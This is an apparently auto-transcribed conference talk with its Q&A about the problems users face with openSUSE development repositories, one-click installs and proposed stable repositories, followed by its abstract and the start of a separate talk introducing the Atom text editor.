the one-click install runner from Firefox. Click number 2, is this window, where it's forcing the adding of additional repositories to their machine. Now for starters, the repositories it's adding are totally crazy. This was run on a tumbleweed machine, my one, I reproduced it a few times to make sure it wasn't going crazy. And you can see there it's adding the tumbleweed repository again for reasons I can't explain. And it's adding open-suzi factory power PC twice, two different versions of power PC repositories on an Intel machine. And I have no idea why it's doing that whatsoever. But it's consistently doing that at least. Now on the search, we said it was only ARM, now when you do it you get something totally different, there's a complete confusing mismatch of what's going on there. At least the next screen is mostly accurate, I only wanted to install Elastic Search and it's pulled the packet information through, so that is all good and great. And then you get a screen here sort of warning you with a nice big red message, you know, these changes will be made to your system. There's no real notice here about how broken what it is about to do is. If you click next here, if this worked, luckily it doesn't, but if this worked you would end up with a totally and utterly broken machine. And there's no real notice for that, we just let them carry along quite happily, add repositories that will break their machine, add a repository that they already have, and install a package that isn't going to work. But we've warned them, we've told them it's all on their own risk. Click number six, of course we require root access to actually install anything. Click number seven, we actually require the GPG key for the addition of a repository because it's not built using our standard authorized keys. And click number eight is when this whole thing goes wrong because the repository which one click install was absolutely certain was fine doesn't actually work. So then the whole thing crashes and the user doesn't get the package they want. Right now, one click installs are broken. I've tried this three or four times with different packages. I wanted to have three or four examples. This one ended up being the first one I tried and that covered everything broken that I could find. So it's one example that covers the whole mess. We really need to get this fixed. If we're going to have one click installs, they have to install stuff in a sensible way, add the correct repositories and do the best to shield our users from doing stupid stuff that breaks their machines. Because then they go to the forums, then they go to IRC, then they go to social media and moan that openSuser is broken. OpenSuser is fine. This is what's broken. Now, as I said in this example, I'm assuming the user is moderately skilled and moderately aware of what we're doing. So of course if you go to OBS, you can find the package in there. And this is the developer languages Python project. Digging around OBS, you can find the list of all of the repositories that it's building against, which is a surprisingly big list for a developer project. I mean, SLE11, SBE3, SBE4, SLE12, SBE1 and SBE2, some weird bleeding factory, which I have no idea what that is, and a whole range of other bits and pieces. But obviously in this case I'm using tumbleweed, so you can click on tumbleweed, you get the list of the packages from there. That tiny little link is actually the only thing I'm interested in because I want to have the list of the repository URL so then I can go to zip or to YAST and add the repository manually, which I do. I then do zip it in. And at this point I'm happy. And everything's fine. It works most of the time. Assuming the package is actually building properly, the package is developed relatively well, most things are all okay. And then I do a zipper up. And zipper wants to warn me that there's 97 packages from developer languages Python that it isn't going to touch. This is what would happen if I'm on a leap. If I'm on tumbleweed and I do a zipper dump, it doesn't tell me it's not going to do anything. It tries to find a way to install the entire list of every single package in developer languages Python. So my lovely tested, secure tumbleweed installation where we spent time testing and testing and testing to make sure that the whole thing works consistently and comprehensively with all of the stuff that, you know, is, for example, into open QA, immediately gets invalidated by package after package after package from developer languages Python. Now, I might be lucky. All 97 of these might work. But the chances are there's going to be at least one that doesn't. And it's going to break some other application elsewhere, make it harder for me to work with my other stuff, and generally cause me problems sooner or later down the road. This is what every leap and tumbleweeder user has to deal with when that package isn't in the distribution. That's the best case. That's just not good engineering. But that's the scratch on the surface. Worst case, we have no quality controls on developer repos. We're not meant to. They're development repos. So build failures happen all the time. Everything's moving around. Your package might not build anymore. When you're working with more and more developer repos, dependency conflicts appear more and more often because we have no quality controls in there. There's nothing stopping one developer repo having one copy of a package and another developer repo having a different copy. So you're going to end up with package conflicts happening from different repositories that, you know, for very sensible reasons. Or the opposite. You end up with unresolvable dependencies because the developer maintainer tried to do a good job of not duplicating stuff needlessly. So it only has the stuff they're interested in developing in there. So there's no way of installing it because it requires some other developer repo which isn't clearly obvious for the user to install. And then even if it works, even if it builds, even if it's dependency sane, the package still might be broken because that's why it's in a develop project. So we can test it. So we can make sure it works. The packages are meant to break in develop projects. That's why we have them so they can break before we put it in the distribution. So what I want from sort of everybody and everything is develop projects shouldn't be used by users ever. Because the more I think about this, the more I think about how we could fix this and how the things that I'm going to suggest going forward, even if we implement every single one of them, we either compromise what the develop projects are meant to be for when it comes to developing stuff, or we end up shipping something broken to users. So in my opinion, we should keep develop projects in the role they were designed for and intended for, and we need to stop users using them. So how do we fix all of this? And there's really two options. One, fix everything. And there's a long list. I mean, so starting with OBS, I know there's some features for this already, but you know, it's also a case of how do we use OBS and maybe not actually changing how OBS works, but changing the projects use of the build service. But maybe we need to have a cross-project dependency checker so we can actually see, okay, this develop repo and this develop repo work together, is everything going to be sane, is it going to work? We've had issues in the past with projects publishing broken packages or packages failing to build, the repo still being published and the entire thing no longer being consistent. So maybe we need to have some way of freezing the publishing of a project when there's a build failure in that repo. Or, or and or, maybe we need a new type of repo. We have the main official repositories. We have home repos for everybody to do anything they want. We have Devel repos for building the distributions. Maybe we need a concept of a stable repo where we can say, okay, this stuff at least has been checked in some sense, it's been built properly. Users can use stable. Maybe that's what we need. Even if we have that zipper in order to kind of support these kind of concepts, maybe we need to get rid of the, we'll not be installed warnings. The vendor concept is one of our greatest things, but at the same time causes an awful lot of confusion. So maybe we need to smoothen it out, tidy it up. Maybe, for example, the stable repos would be built under the open-suser key. Maybe not because Kulo shaking his head at me already. And of course, improving the search functionality both from, you know, software.open-suser.org search and the OBS web search, but actually baking that ability to search into our tools, into YAST, into zipper. So if you do a command, you know, maybe there should be a zipper CNF, command not found, zipper can tell you, hey, it's in this repository over there in the build service, add it in there. And there's already talk about doing that for SLEE modules. It's something we desperately need so users can find out where to get the stuff that they want. Adding that to the AST, of course, if we're doing it in zipper, we really should do it there, too. In the one-click install, please, just we need to fix everything there. It needs to stop adding insane repositories to people's machines. It shouldn't be doing stuff like PowerPC for Intel. That's never going to work. And it isn't a one-click install. When it works best, it's still nine. So, you know, nine-plus click install, we need to, you know, stop just pretending that it's the fastest way of doing everything. And on software.open-suser.org search, I mean, this has already started moving because we had the workshop on Thursday. So we already have people looking at software.open-suser.org tidying it up, simplifying it. And we really should be removing home repos and develop repos or making it incredibly hard to find it and incredibly obvious that you should be using the distribution first. Or we could just give up on packaging. There is these wonderful things called snappy and flatpack. In theory, for some of these, for some of the issues here, so, for example, installing applications on top of Leap, there is some benefit there. Leap user wants to have the latest shiny version of Libre Office. It's a heck of a lot easier for us to put it in a flatpack with the no-muntime and all of that and have it installed. But as I thought about this, as I put this slide together, it's always going to be an edge case if we use it properly. Because you don't want to get to the point where everything in your distribution, user-facing at least, is in some nasty containerized beast, and then you explain to users why your minimal install is 40 gigabytes for 300 packages. And then there's an open SSL update, and every one of those packages has to be updated, and then it's suddenly 40 gigabytes just to patch your machine. It's not the best way of doing things. But all of this stuff put together is a huge amount of work. Maybe, you know, we should go down this road. We should try and fix as many of these. But there is a shortcut. And, you know, during the keynote, we said, you know, British people and I love these swearing, the easy option is to add your bloody packages to the distribution. Once they're there, they're tested, they're integrated, we have the tools, we have the techniques, we have the policies. This is how we should be getting software to our users. Tumbleweed and Leap should have as many packages as we can support to all of our users. We need to be doing that better. Even if we improve the other stuff. We still need to be doing this a heck of a lot more. And the best thing users can do to help us? Well, they can help become maintainers, they can learn, or they can bug our maintainers to try and get stuff in there. The biggest bit of feedback I always hear is, oh, I didn't know anybody was using it. I didn't know somebody wanted that package. So please, users, if you're interested in a package, go to the open-seizer factory mailing list, try and find people to package stuff, try and learn to help. We need to get more packages in there because that is the best, smoothest, and safest way of getting software in the hands of people. So now, kind of, less of the user story, more of the developer story. Why is this such a hard thing? How have we got it? Where is the problem, really? Well, putting packages into the distribution is too hard. Everybody says that, ever. Even me. I've said it as well. It's sometimes true. And there is some truth to that. It's not trivial putting something in a distribution. But when you compare to what we're doing right now, this ends up actually being easier than the mess we're producing right now with our current way of doing things. Because if you think of, for example, the factory development process, this is how a package goes into factory and ends up in tumbleweed right now. Every single one of these steps was designed because our developers are lazy. And we want to make the next step less work and have less work to do in the future. We have the whole, you know, the first submission is reviewed by a whole bunch of bots because we don't want to be wasting our time reviewing for trivial issues. We preintegrate test everything in staging and open QA because we don't want to be bothered with having to pick up a whole mess of a complicated distribution mangling of, you know, package A from package B and crashing when it ends up in the distribution at the end. We only review what we have to, when we have to, with the policies that make sense so factory can be kept clean, consistent, and moving as fast as it can. And then we QA test everything as much as possible, as often as possible, so we have as few users moaning about stuff being broken. All of this is actually to save us work. When we put something in a developer repo, we skip every bit of this. So every problem that this was designed to solve is totally an utterly bypassed. And, in fact, it produces more problems. Because the role of the developer project isn't just a case of, oh, it's a nice convenient place to throw a few things before it goes into factory. Every upstream is different. KDE have different places of doing things. Nome have different places of doing things. So the upstreams all have different requirements. And we need to be agile enough to be able to cope with that, build it slightly differently, have different processes. Our teams, you know, most of our teams are volunteers now. We want to make sure that those teams are using processes and techniques that make sense to them and fit their needs and how much time they can volunteer. So this is why we have the development group concept so we can have lots of different teams in the open-suser project working at their own pace in their own way and hopefully somewhat self-moderating, making sure that their part that they know about is very, very good, and then they throw it towards factory, hit that process there where we then pull the whole thing together. When you just do develop projects on their own, you're building a castle on shifting sands. Your project is moving at the pace that you know your project is moving in. But you don't know how fast factory is moving. You don't know how fast that other project is moving that's going to change something in factory that's going to change your thing. You might have everything working wonderfully in your develop project. You might be perfect, but is everybody else? And if you're working in isolation, you're just going to end up causing yourself more hassle in the long run when you maybe do eventually put it into factory and you do eventually submit it to a distribution and then it all goes horribly, horribly wrong. This was the kind of stuff that we ended up coming up in the conversation with the KDE neon guys earlier in the week. They're doing something very similar to a traditional open-suser develop project. Everything's fine for them now. They're going to have to rebase against the new Ubuntu version in the future. That's going to be a huge undertaking. The reason we have the factory process, the reason we do tumbleweed is so this can just be done in small chunks at our own pace, at our own time, using our own processes so you avoid big calamitous messes as a developer where you have to spend weeks and weeks picking out the mess. So please stop misusing develop projects. We should be using develop projects to develop for our distributions. We don't support 13.1 anymore. Evergreen maintains what it can, but there should be no expectation for our users to have shiny latest new Python on 13.1. 13.2 is going to be end of life in less than a year. Why are we still building the latest Python on top of it? These are the Python modules that develop language Python where the Python is actually building is worse than this. I couldn't fit it all on the screen. So please, build only what you need in the develop project. The one thing you should always have is factory. The next thing, obviously, we're developing leap 42.2 now. There is the possibility that some things might want to skip ahead or move from a develop project straight into there. Adding leap 42.2 or adding SLEE 12.0 next is the only three things that should be in a develop project. That's the only three targets where something might end up being sent as a submit request. They're the only things we're building stuff for. Everything else is not suitable for a develop repo. It's more work for you to maintain it, it's more work for you to fix it when it goes wrong, and it's more work for OBS to build it. Why are we wasting so much time and so much effort on something that ends up being a bad thing for our users in any way? This is belaboring the point a little bit, but tumbleweed today will become leap 43 in SLEE 13 in the future. If we follow this process now, we move along, add to the pace of tumbleweed, which is at the pace of contribution so we can set the pace that suits us with our time as volunteers or as busy Suzer employees, we can still avoid chaos in the future. Leap benefits from that, SLEE benefits from that, it's way easier to pull the packages from being in tumbleweed for a couple of weeks and then shove them into leap. Keeping the packages only in a develop repo hide major integration issues, and then you have a huge and hard time getting everything working. Now, I know I'm asking everybody to do an awful lot more work, or maybe seem like to do more work, but you're not alone. We know what we're doing with this. We've been doing it for a very long time, we have the experts, we have the community around it, open Suzer factory is where you should be discussing adding new packages, removing packages. If you're having issues and actually building a package, open Suzer packaging is where you can get help on the nitty gritty of that. We have our SLEE list and obviously the open Suzer release team of Ludwig Dummack and Max, keeping all of this clean and tidy in leap and in tumbleweed. Now, every time I talk to anybody about this, I hear the same thing. Our policies are too strict. But they exist for damn good reasons. They've all come from the fact that we've been doing this now for ten years or longer, and every single one of those rules exists for either a good engineering reason or a good community reason. The ones that I hear most people object to are the ones that are there for actually because of the community. As developers, it's probably quite easy for us. We look at it and we say, I can see how that makes the code a high quality. The policy makes sense. But we're an open source project. And if we're not doing stuff like making sure that our change logs are easy to read, easily passable, spec files that are actually sane so somebody else someday might be able to come over and pick it up and read it and use it and make it better, those in some respects are more important policies because they're the ones that actually make open SUSE sustainable in the long term. So, yes, our policies do exist for a reason. Sometimes you might not necessarily get the logic behind it, but they're not crazy. They're not strict just for the sake of being strict. They're strict for the sake of actually making it easier in the long term to keep the community moving forward. And ultimately, they share an awful lot in common with the ones used internally as SUSE for SUSE for the enterprise. It's a very, very good quality distribution. They know what they're doing. We know what we're doing. We work very, very well with that. But no open SUSE policy is set in stone. We can discuss them. We can adapt them. If there is a sensible reason to do so, let's talk about it. Now, slides not working. There we go. I want to see as much as we can in the distribution. But being a realist, I know we can't put everything in there. Legal reasons, engineering reasons, and sometimes practical reasons of just wanting to offer something in a slightly different way doesn't mean that we can put everything in there. We need to get better than what we've been doing, but sometimes additional repos have to be done, right? And the way SUSE builds SLEE is a model we really should be considering for some of our stuff. Because they generally don't, with the exception of Package Hub, generally don't build an add-on in a separate project and just hope it magically works. Inside the internal SUSE build service, there is one big SLEE project, which is very, very similar to our big factory project. And everything is built there and tested there and consistently made sure that it works together, all cut from the same cloth, and then the products are separated out and distributed differently as different repositories. This works very, very well. Because you make sure that everything is being built together. It's been designed to work together. It's more likely to be very easy that a customer can then add any combination of those add-ons or modules together, and the thing is going to work. It's a heck of a lot easier to test it together. And also, because ultimately all that carving up takes a little bit of work, there's a little bit of work involved in separating this stuff, it makes sure that each extension or module or add-on is as small as it needs to be and no bigger. Which is a very good thing from an engineering perspective, and it also makes sure that they only move when they need to, the less times you move it, the less times it breaks. So I think when open suzer comes to thinking about add-ons, we really should only be thinking about it when there's no other choice. It should be in the distribution by default whenever we can do it. It's less complicated. It's easier for our users. It's easier for us to maintain in the long run. So for tumbleweed, my personal feeling is we should start with the concept of no add-ons. There shouldn't be any need to add an additional repo for tumbleweed because the whole thing is always rolling. We can always submit something new. We can always change it, so why bother? The exception, of course, being proprietary kernel modules, which are potentially technically and legally issued, put in there, and obviously sister projects like Pac-Man where we can't do that either. But for Leap, yes. I think there is a case for stable projects, possibly. Users might want a stable version of something newer than what's been released. That's really the only use case, I think, of where we should be spending lots of effort thinking about this. Backporting new versions of stuff for Leap users. And if we do do this, it should be a small, tightly-defined repo. Just what the user needs to get what the user wants. Not every single library, not every single module, just the bits that are needed to get the user happy. And, of course, it should only be built for Leap. Because, well, 13.1 and 13.2 are both sending support soon, and Sly already has package hub. From a conceptual point of view, I kind of see it working something like this, maybe. There's a develop project. In tumbleweed, there's already Python that's been submitted. And then we backport it, take it out again, have it as a stable repository for Leap. Because then from a user's perspective, everything becomes easier again. They have Leap. They add a repo. And because that repo is only what needs to be to get the thing in the hands of the users, a zip-adopt should be a perfectly sane and sensible way of updating it. So, in theory, that freeze of develop projects is so they're only built for development. Again, as they should be. So, we're not wasting our time worrying about build failures on architectures we don't support or build failures against distributions we don't support. It gives users a nice, clear, easy way of saying, okay, that's a stable repo. I can use that. It makes it clear to users which ones are safe. It tidies up a lot of mess. And it should be a heck of a lot easier for us to test, especially because I want to put everything in open QA. But this isn't a perfect concept. There are still problems. Because how do we define small and tiny? How small is it really? We haven't got any policies for that. We haven't got any concept of that. We need to think about that and be exactly sure how we define what is narrow. How do we review it? How do we make sure we can actually do this sustainable for several years? How do we solve dependencies between repos? How do we make sure that someone adding stable A and stable B doesn't clash with each other? How do we handle upgrades? How do we handle versions of leap that change? How do we handle versions of the stable repository that change? Do we end up with maintenance? Do we end up with testing? And the more I think about these problems, the more I go back to my earlier point, adding packages to the distribution is actually easier than figuring this mess out. But this is the mess we have to figure out if additional repositories are going to be sensibly usable by users in the long term. So to recap, maintainers, please put your packages in the distro. Users, please stop using developer projects because it's going to break on you sooner or later. Stable repositories might be a good idea, but it's going to take a heck of a lot of work, a lot of discussion, a lot of planning. But if we want to keep that concept of additional repositories with people who can sort of Lego brick build their distro, let's collectively get together and do it. We can't carry on like this. Questions? Hey, Stanislav. Can somebody get him a microphone? Thank you. Well, 10 years ago when we created the developers repositories, we have been thinking about the idea that, for example, if you want the latest GIMP that you don't have to install a factory, but you can subscribe to the repository. But now it looks like a bad idea. I think that we should drop most of the developers repositories and keep one developer repository like staging and make some reasonable exceptions like GNOME next or so. Because in fact, there is no reason to subscribe and leave packages to the developer repository because it cannot break anything. Yeah, you're right. It can break anything. I'm actually really thinking more of leap users. We're taking the version of something in a developer repository before it's even got a factory and then breaking everything there. So one reason there is the idea of flat packs and whatever is. One specific example that I'm not seeing that your proposal is solving. Suppose you want to support HTTP2, right? So what you need in order to be really HTTP2 compliant is a more recent version of OpenSSL than almost any stable distribution shipping, which is 102. Most modern distributions do have that, but usually on servers you're running stable distributions for a reason. So how are you going to solve that? Because OpenSSL is a very fundamental library. Now, let's say an engine X compiles a site in a flat pack with its own OpenSSL that's easy. But of course it's one to one to avoid. But how are you going to solve that? Well, if there really is a use case for something like that, I think there is. I mean, with leap we don't follow the traditional ode. Everything must be frozen after the point of release. We can do version upgrades in the maintenance model. Maybe we shouldn't be doing that for OpenSSL. But we do have that flexibility. Plus with an annual release cycle, it's not actually that far away to the next leap 42.X when that could be done. So in the case of tumbleweed, it moves right through. It's already there. In fact, that example I think was put in a few months ago. And it's going to be there now in leap 42.2 in November. So yeah, I think with the way we've already got the model there, we don't brush into that issue too much when we do the back ports or flat packs are the solution to that. So I'm in fully agreement with your analysis and some part of your solution like pushing more packages to tumbleweed, which is definitely something we should do. The only problem with that is that for more or less long period of time, we are keeping leap user out of the loop. If for instance, we push a package in tumbleweed one month after 42.2 is released, we have to handle user on leap. And I'm wondering if we should try to expand or tune the concept of package up, meaning having not only back ports, but new packages available as a maintenance project for leap so that when maintenance things push packages to tumbleweed, they can also push the same packages build stable on this package up for leap repo. It wouldn't move. We could do automatic check on it. And people would be always able to revert to this version if there is a new version coming out. A bit like an update repo, but for new packages and not just for new version of packages with charm leap, which is I would say another problem. I totally agree with you. That's actually one of the reasons why I put these here. If we do this in this model, that would enable that. But I'd love Scott's opinion on that just to put him on the spot. Actually, I'm glad you brought this slide up because I had a correction for you. Instead of building against the SLEE 12 SPX, if you want to build packages for SLEE, what we recommend now is to build against the open SUSE back ports colon SLEE 12. Because that's where we want to like for basically many of the same reasons that Richard talked about why it makes sense to get more things into factory and into tumbleweed we found as we're trying to investigate the best ways to deliver packages for our enterprise users from OBS. It's it'll be better to build your package. It could be much better to build your packages against this back ports project in for SLEE 12. So that should be actually back ports. Forget. Yeah. Okay. There. Another comment I had is as I was also doing a bit of investigation, I also happened to look at the Python project and Richard and I didn't even talk about his presentation or anything and I presented something quite similar in the talk I did about back ports yesterday. Some of the same concepts. But one thing you didn't mention where pushing things into factory makes it easier for packages, I believe, from what I've seen in the build services that in like in the Python project, they're doing source copies or source links from other devil projects because of dependencies they have and those packages that they have that their source copying in are not in tumbleweed. So they need to maintain a copy within their own project so they can build the package. Now that could make it easier for them to build if it was just in tumbleweed to begin with and not only that, because those dependent packages aren't in tumbleweed, it blocks them from releasing their package into tumbleweed. So the more we work on pushing the stuff into factory and tumbleweed, it should make it easier for all of us who are maintaining packages because we can more easily build upon each other's work. I totally agree. Actually, we discussed this when we prepared the tumbleweed itself, how to work with the devil projects and one of the items that we're not ever fixed was that everything that's in devil project should be in tumbleweed or linked to somewhere else to support building only for the other distributions, but it was never finished. So it's still standing there like this. From my point of view, yeah, we should simply build against factory and for new packages, new versions, we still have working maintenance projects and we accept both of those, either version updates or new packages into the distribution. So it's just that people never actually bothered to request updates or the new packages in Leap or they don't know they could request it actually. I agree. Adrian has a question, though. I disagree a bit that you should not build against stable distributions because this, from my point of view, this rules out that we get upstream people working directly with our next distributions because they are interested in first place in the stable distributions and tumbleweed and factory and backpots are just an add-on. They focus mostly to get their users satisfied and their users usually are on a stable version. Okay, we could work in one project, then submit to devil project and then submit, but they have usually one workplace and you just ignore it when you submit it back. You have one workplace where you look at and you fix your stuff there and I don't think this is working. I mean, I'm lately trying to put some packages to factory again and I get the packages working within a day and it takes more than a month to get something to factory and for an upstream guy who focus on the stable distributions for their users, I just remove factory repos and tumbleweed. But you end up with an upstream guy targeting, for example, Leap42.1 which has approximately one year of support left to it. And then, okay, we could push that out as a maintenance update but it's not going to benefit from any of this testing, any of these steps, any of the reviews. We really want to have upstream people working with tumbleweed first because they can move that all the time. My point was I think you are separating these groups unnecessarily. Why not work together with upstream people also on the next distribution packages? But if you say these devil projects must not build for stable distributions, you are ruling them out. You are ruling out an entire large group of developers in the build service. But then we're going to have to do a whole bunch of duplication because they might have it working on Leap42.1, it might not work on factory, who is going to take care of that second part? We get ourselves into those messes where we have a whole bunch of stuff that works on our older distros and then we can't get the thing in factory and then it ends up being dropped in factory which is how we have weird and wonderful messes like now where factory is missing stuff that's in Leap and factory is missing stuff that's in Sleap. We need to stop that. Okay, but you're only seeing it from the point of view of the next distributions. The other groups are looking exactly from the other direction. They're looking for their users, for their stable distributions. And you say you don't want them? We have an upstream here who has a comment to say, so let's see what KDE has to say on this. No pressure, Martin. So I think upstreams are not interested in providing software for distributions because they are too many distributions. If they try, they fail. That's exactly what we see. Like if in our own cloud case they did actually packages and the developers were pissed at them because they did bad packages. Just like the open SUSE and I think that's what we see everywhere. The upstream developers don't want to middle with 20 different distributions and that's why there are things like flat pack. I think that's a way to go for upstream projects trying to get software to a stable distribution if they want to. They need to stop doing packages if they do that and I think most upstreams just don't care because they cannot keep up with it. And if they do care and they only want to work on one of our distributions, I'd much rather they work on Dumbledore because that's the one that is the next. Lars? Oh, Kula first. She gave me the microphone without knowing your rules. So I agree completely with Adler and here. Basically you're ignoring where the users are because just as Martin says, upstreams don't care about distributions, they care about users. The own cloud client in OBS exists not because of Leap or Tumbleweed, they exist because of their own cloud users. That's what they have the package for and that's why the package is so bad because they rather deploy a workaround, have yet another distribution building than having a clean package that would be acceptable for the distribution as is. And I would like to ask you what software did you use to create your blog post? Jackal? Jackal. Is this in a distribution? Not yet. So did you ask anyone to submit it to a distribution? Yes. Did he do that? He said he will. Did you wait for him to finish including it in a distribution? He was a little busy helping set the conference up. So basically you're saying no. No, I'm saying it should be in the distribution and that's what I'm going to continue pushing for. But you already have it now, right? Yes, but I don't necessarily mind that my blog might break any time. But it's not the point I was trying to make. The point is users are very, very happy that there are home projects building packages that are not necessarily yet in the distribution. But that is a lame excuse. We should not be doing that. We shouldn't accept that asifiable. We should be doing it better than that. Because ultimately it will break and then who's going to fix it for that user? I can fix it for myself when it comes to Jackal. I can just spend the time fixing my damn package. We expect all of our users to do that? The problem is how many steps of those that are currently on screen are applying to Jackal? Non pre-integration testing, no QA afterwards, almost no factory permission. So basically the gain of having it submitted is really having someone doing manual review and yelling at you because you put some background. You're focusing on the engineering part. You forgot all of that stuff with software.opensucida.org and ZIPA where it's a nightmare getting the damn thing in the first place. But Torsten has something to say. Yes, Kulo, if you say that the engineers need a stable version of the devil project, that's wrong. Because as Richard thought, if you add a devil project on your distribution leap in older one and run ZIPA dub, most of the time your installation is afterwards broken. So before you add the stable things to devil projects, it's not the right way to go. But creating stable repos and then add the old stable distributions to it to build, that's the right way to go. Could you give it a loud? He's been raising his hand. Yes. Sorry. So I have a couple of things. First of all, you mentioned that one click install problem we have. So you say our users should be able to easily install packages from devil projects. I see. How does that fit with your second answer that users should not use packages from the devil project? Okay. Good question. If we are going to offer some kind of stable repository, if we are going to support some workflow where we do expect users to use additional repositories, they should have some easy way of doing it. So right now I think we should stop using develop projects. If we do that entirely, then one click install becomes meaningless and we don't need it. If we instead put in something like some stable repositories, something like one click install becomes important, we have to fix it. So you are just inventing new staging or better stable repositories, right? Yes. Okay. No comment to that. I just want to know who's doing the work. But that's another point. On the other way, I totally agree with Kulu and Adrian. I try to keep track on all the 400 or 500 packages in education. And I have people from upstream working with me, luckily, at least 10 of them are working on their code in education. Most of them just care for the Debian packages or for some Fedora packages. So no, what should I do? Should I try to convince them pushing all that stuff to tumbleweed? They would say how many users inside the education world are using tumbleweed? And I can tell you from my own experience right now, during summertime when all the schools having vacation, that's the time when teachers updating their systems. During a whole year, you see nothing. But during summertime, all teachers updating all their school servers and school clients to the latest and greatest version, which is not tumbleweed because they have students, they have to rely on a stable distribution. So the best case that I see always is that they are using Leap right now. But to be honest, they still run OpenSuser 13.1 and they still run OpenSuser 11.4 just to keep you an idea of it. And that's the reason why we in the education project, for example, still support such old distributions. And I can fully understand them because on one side, I'm as a developer want to have the latest and greatest stuff. On the other side, I have to agree with them, they have no time to work on that all the time. They have just a limited amount of time and they are happy if their system is stable enough to run their daily workload. And they are just happy that they can use our devil project because there they can even find some up to date packages they want to use in the daily workflow. But how is it going to work when that package is broken? How is it going to work when the develop package is broken? When the project is broken? Easy answer. Here's the solution. The devil maintainers. That's it. And we have such a mess right now because the developers can't keep that workload. Yeah. So you obviously have picked the most stupid example. I mean, adding devil languages Perl or devil languages Python or something like that to your machine and not being a hardcore Perl developer or even then is certainly not going to work because it has some 5,000 packages in there and obviously all are affecting the base system. So this will be not working obviously. For the purpose of this example, I was a user who just wanted elastic search. I didn't want Python. I didn't care about the modules. All I wanted was elastic search. Yes. So what do we need to do? Maybe, Lars and I, we are lucky because our devil repositories actually are not devil repositories because Lars is education. It's not devil education. It's education. So it's not a devil repository. My pet repository is the VDR, the video disc recorder repository. It's also not a devil repository by name. We're just lucky because they're old enough. They were created before the namespace was cluttered with devil. And one example is the VDR repositories. There are two of them. VDR and VDR plugins. And there's no way I'm ever going to submit the VDR plugins to factory because that's just too much humiliation I'm going to endure trying to get this code in there. The code is still useful and it works. And it works from Shredin.to, Leap, Tumbleweed, because I tested there. And so maybe what we need, I can follow you that we don't want the real hard, die hard devil repositories added to everyone's machine. But something like really we have somewhere where people say, okay, this is a somewhat stable. You have to trust us as developers that we keep it somewhat stable. We will probably not update Glib scene or repository or something like that, some stupid stuff. But just the education or sometimes also the games repository is one of them where occasionally fix stuff. I'll accept your point to a bit because something like the VDR repository might be a prototype for what could end up being called a stable repository in the future. But then we need to still answer these other questions. You do it yourself right now and everybody is just expected to trust you. No, let's have some standards, let's have some criteria, some quality controls. So everybody who's saying I'm doing this in my stable repository, it's good enough. One last question I think Ralph had his hand up. I have a question. I think the main reason what caused the problem with elastic surges that has ended up in the wrong repository. It should never been in a Python repository. It's a Java project. It should be, to my opinion, in a logging project. And I think projects like I maintain also stuff in games, in monitoring, in security. I think these are all useful projects. And it's all, yeah, I agree also that it's a lot of extra work to maintain it. And if you also push it up streams, I mean, I have a project like KACTI and it causes a lot of work because I pushed it upstream. Now I have to do an update. I have to update in all different open source versions. If it would be only in monitoring, it would be a lot less work for me. And that's a fair point. But then we need our maintainers to stop treating develop projects just like a dumping ground like they are right now. If they wanted to be used by users, we need to be worrying about which one it's in. And how is somebody going to consume it? How is this actually really meant to work in the real world, not just on our developer machines? But is it not to maintain as to decide if a project belongs there? I think they should have rejected their request and submitted request in Python. I'm not so sure. So listening carefully and I'm not a package or developer here. So I'm definitely coming from the user side. I think you're trying to bring two teams or maybe even three different categories all together with one slide deck. And I think that's the problem because I also can see that what an upstream maintainer wants from our tools is different and they call success different than what a developer or a distro package a developer wants and what a user wants. So maybe if you change the wording a little bit, not has too much or stable, you know, you associate with stable a lot of criteria being really quality stamped and all of that. And that might be too much for somebody who in his free time makes VDR work, right? Maybe the trick is using a different term. There's an apps repo or there's a leaf package repo because for leaf packages, as some people said, they'll not mess around with base dependencies. And, you know, there is this criteria. It's good enough. Somebody has tested it so I can install it for a leaf package. I think that's fine. Pushing it to factory is maybe asking for too much or applying all these things. But if it's a leaf package, it's very easy to push the factory. That's, you know, we are. But if you then ask for all these additional things, it has to pass this thing and it has to pass all of these other things. And like somebody said, what is the benefit for me as the guy in the free time packages it? If I don't have benefit from it, then why should I do it? So I can understand that. At the same time, I think there are really good ideas in there. And maybe not my thing versus your thing, but there is middle ground. There is these leaf packages and which are nice to have on as many distributions as there are users for. And if build power is a problem, we can talk about that. But matching developer and user and one slide tech is a difficult problem, I think. It is. But that's the reason I did this slide tech, actually, because I think we've forgotten what our users are suffering because of the decisions we've made as developers. So I totally agree with the first 35 slides. Thank you. And I've already run five minutes over, so thank you very much.
openSUSE has a wonderful platform with OBS, and tools like software.opensuse.org and 1-Click installs make it very easy for users to get additional software on their machines. This talk will discuss how this is quite often a very bad thing, leading to problems for users as well as extra work for maintainers in both the short and long term. It will discuss the benefits of putting software packages in both of openSUSE's distributions (Leap & Tumbleweed) and propose concrete steps which users and responsible package maintainers can take to ensure everything is put together and working as smoothly as possible. Finally, the session will accept the reality that putting absolutely everything in a distribution is infeasible and discuss possible criteria and guidelines for sensibly defined, maintainable additional repositories that avoid the issues raised earlier in the session.
10.5446/54444 (DOI)
Okay, hello everybody. My name is Vladislav Svazak, I'm a member of the YAS team. In this short presentation, I will show you the Atom Editor, some features which I like, so maybe you can try it and use it. The Atom Editor has a motto, a heckable text editor for the 21st century. And let's see if that's true. I have just two slides and I will show you live in the demo so we can see how it works. So some short interaction, Atom is an open source project, it was started by GitHub and currently there is large community around and yeah, it has many ways how to extend it. They think of it as a modern editor which is similar, if you look at it, you will see it's similar to sublime text or text made. There is some plugin which allows importing syntax highlighting definitions from text made, so there are some similarities. They are focused on both users, in essence writers who writes the code or text in the editor and also on the programs who develop the packages, the editor itself, extend plugins, write new UI themes and so on. And they use also the term heckable to the core, so I will also show something later. If you want to install it, there are pre-built packages at Atom.io. Just download the RPM link, you just download it and install it. I suggest to use Zipper because it has some additional dependencies to packages which are not installed by default, they are just some small packages, so Zipper makes it easier. Or you can build it from sources but that's quite complicated. There was some Hackweek project to build it in OBS but I don't know how it ended. I haven't seen the packages in OBS yet. As I mentioned, it's extensible via plugins, unfortunately they call them again packages, so it's kind of confusing sometimes. And that package manager has a command line to APM, so for example I will present some packages or extensions, it would like to use them, so maybe this command which actually installs all packages which I like or mark as a star, so this way you can quite easily install a bunch of plugins to the base. So let's start with some demos, you can see some nice features. And one disclaimer, it doesn't mean that you should drop your fine-tuned Emacs, VIM configuration or whatever. So personally, I sometimes still use VIM because for example if I want to edit just one single file, one small change, it doesn't make sense to run this full Blower Editor, running VIM is much faster. It does not work in all cases, in some cases using DD always is still better. I have opened several projects, I will switch to them because some specific features. This is how the Atom Editor looks, it's the usual editing area with some file navigation and some menus and some status bar, just like many others. So I will show some interesting features which makes it somehow standing 